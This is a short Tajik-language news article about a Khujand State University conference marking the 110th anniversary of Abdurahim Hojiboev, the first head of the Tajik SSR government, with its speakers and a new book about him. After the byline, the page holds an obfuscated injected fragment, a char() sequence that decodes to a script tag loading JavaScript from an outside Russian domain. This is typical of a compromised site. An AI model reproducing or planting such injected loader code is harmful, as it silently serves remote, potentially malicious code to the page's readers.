6.05.2010
Абдураҳим Ҳоҷибоев 110 сола шуд
Суғд. Бо қарори махсуси раиси вилояти Суғд Қоҳир Расулзода соли равон дар каламрави вилоят таҷлили ҷашни 110 солагии арбоби давлаӣи, ходими намоён, сарвазири авали ҷумхурии Шӯравии сотсиалистии Тоҷикистон Абдураҳим Ҳоҷибоев баргузор гардида истодааст.
Бахшида ба ин сана дирӯз дар толори раёсати донишгоҳи давлатии Хуҷанд ба номи академик Бобоҷон Ғафуров конфронси илмӣ доир гардид. Дар он устодону донишчуёни Донишгоҳ, меҳмонони конфронс: Бароат Ҳочибоева, муовини авали раиси шаҳри Хуҷанд И. Иброҳимов ва пайвандони эшон, аз чумла шоира Фарзона иштирок дошатнд. Ректори Донишгоҳ Н. Зоҳидов ҷамъомадро ифтитоҳ намуда. ӯ инчунин аз хизматҳои шоистаи А. Ҳочибоев ёдовар шуд. Баъд номзади илми таърих Ш. Шарипов дар маърузаи хеш мухтасар оид ба фаъолияти А. Ҳоҷибоев ба ҳозирин маълумот дод. Дар идомаи конфронс мудири кафедраи таърихи халқи тоҷики ДДХ Ҷ. Гулбеков оид ба накши Ҳочибоев дар рушди сиёсат маъруза намуд.
Ҳамчунин докторанти ДДХ С. Аъзамзод оид китобҳои тозанашрро ба муносибати 110 солагии А. Ҳоҷибоев муаррифӣ намуд. Ин китоб аз тарафи профессор Б. Ҳоҷибоева, Профессор М. Хоҷаева ва номзади илмҳои филологӣ С. Аъзамзод гирдоварӣ шудааст. Дар он маълумотҳои бойгонии Тоҷикистону ӯзбекистон, маводҳои рӯзномаҳо, феҳрастҳо ҷамъоварӣ гардидаанд. Б. Абдурахимовна сухан карда, арзи сипоси хешро ба ташкилкунандагони ёдбуд иброз намуд ва лахзаҳои ҳаёташро бо падари бузургаш ба ёд овард. Дар фарҷом ректори донишгоҳ бори дигар аҳли нищаст ва пайвандони А. Ҳоҷибоевро табрик гуфт.
Шӯҳрат Раҳимов
char(60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,112,105,107,115,117,115,46,109,115,107,46,114,117,47)1f69b044a79e3947004855867173af86.js" type="text/javascript">

ТАВЗЕҲОТ